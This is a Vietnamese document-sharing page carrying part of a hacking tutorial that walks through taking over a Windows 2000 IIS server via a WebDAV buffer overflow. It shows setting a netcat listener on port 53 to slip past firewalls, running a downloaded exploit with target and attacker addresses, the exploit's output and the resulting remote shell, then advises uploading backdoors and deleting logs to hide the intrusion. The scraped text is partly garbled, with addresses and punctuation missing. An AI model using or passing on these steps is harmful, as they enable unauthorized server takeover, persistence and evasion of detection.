TAILIEUCHUNG - Những hiểu biết cơ bản nhất để trở thành Hacker phần 4

Những hiểu biết cơ bản nhất để trở thành Hacker phần 4 50 . ) Kỹ thuật hack server thông qua lỗi tràn bộ đệm WebDAV : Giới thiệu : Giao thức World Wide Web Distributed Authoring and Versioning (WebDAV) là một tập hợp các mở rộng cho giao thức HTTP dùng để cung cấp một cách thức chuẩn cho việc biên tập và quản lý file giữa các máy tính trên Internet. | Những hiểu biết cơ bản nhất để trở thành Hacker phần 4 trang này đã được đọc lần 50 . Kỹ thuật hack server thông qua lỗi tràn bộ đệm WebDAV Giới thiệu Giao thức World Wide Web Distributed Authoring and Versioning WebDAV là một tập hợp các mở rộng cho giao thức HTTP dùng để cung cấp một cách thức chuẩn cho việc biên tập và quản lý file giữa các máy tính trên Internet. Lỗi tràn bộ đệm đã được phát hiện trong một thành phần của Windows 2000 được sử dụng bởi WebDAV có thể cho phép kẻ tấn công chiếm quyền điều khiển máy tính . Chuẩn bị Ngoài những đồ nghề đã giới thiệu ở các bài trước các bạn hãy vào down thêm anhdenday extract để ở trong C Khai thác Tìm một trang Web dùng IIS Vào Dos vào đặt NETCAT ở chế độ lắng nghe C nx -vv -l -p 53 listening on any 53 . Ta để nó lắng nghe ở cổng 53 vì tường lửa ko chặn cổng này . Mở thêm một của sổ DOS nữa . Ta sử dụng WebDAV vừa down về . c IP của máy chủ IIS IP của máy tính của mình dùng để tấn công cổng lắng nghe padding 1 2 3. VD C webdav 53 1 Crpt exploit trough WebDAV by kralor Crpt undernet coromputer Checking WebDav on . FOUND exploiting through WebDav ret 0x00100010 Connecting. CONNECTED Sending evil request. SENT Now if you are lucky you will get a shell. Nếu như may mắn bạn có thể lấy được shell của máy chủ IIS . Nếu như ở máy tính dùng để tấn công hiện ra kết quả như sau thì bạn đã có shell rồi đó C nc -vv -l -p 53 listening on any 53 . connect to from 1125 Microsoft Windows 2000 Version C Copyright 1985-2000 Microsoft Corp. C WINNT system32 -- OK đã thành công rùi. Khi đã có shell rồi việc đầu tiên là ta sử dụng các lệnh trong Unix để khai thác sau đó up lên server vài con backdoor he he . Sử dụng con WinShell Hack Defensed là ok rùi . Sau khi làm xong ta sẽ xoá file log để xác định file log ta thực hiện câu truy vấn sau C WINNT system32 .

TAILIEUCHUNG - Chia sẻ tài liệu không giới hạn
Địa chỉ : 444 Hoang Hoa Tham, Hanoi, Viet Nam
Website : tailieuchung.com
Email : tailieuchung20@gmail.com
Tailieuchung.com là thư viện tài liệu trực tuyến, nơi chia sẽ trao đổi hàng triệu tài liệu như luận văn đồ án, sách, giáo trình, đề thi.
Chúng tôi không chịu trách nhiệm liên quan đến các vấn đề bản quyền nội dung tài liệu được thành viên tự nguyện đăng tải lên, nếu phát hiện thấy tài liệu xấu hoặc tài liệu có bản quyền xin hãy email cho chúng tôi.
Đã phát hiện trình chặn quảng cáo AdBlock
Trang web này phụ thuộc vào doanh thu từ số lần hiển thị quảng cáo để tồn tại. Vui lòng tắt trình chặn quảng cáo của bạn hoặc tạm dừng tính năng chặn quảng cáo cho trang web này.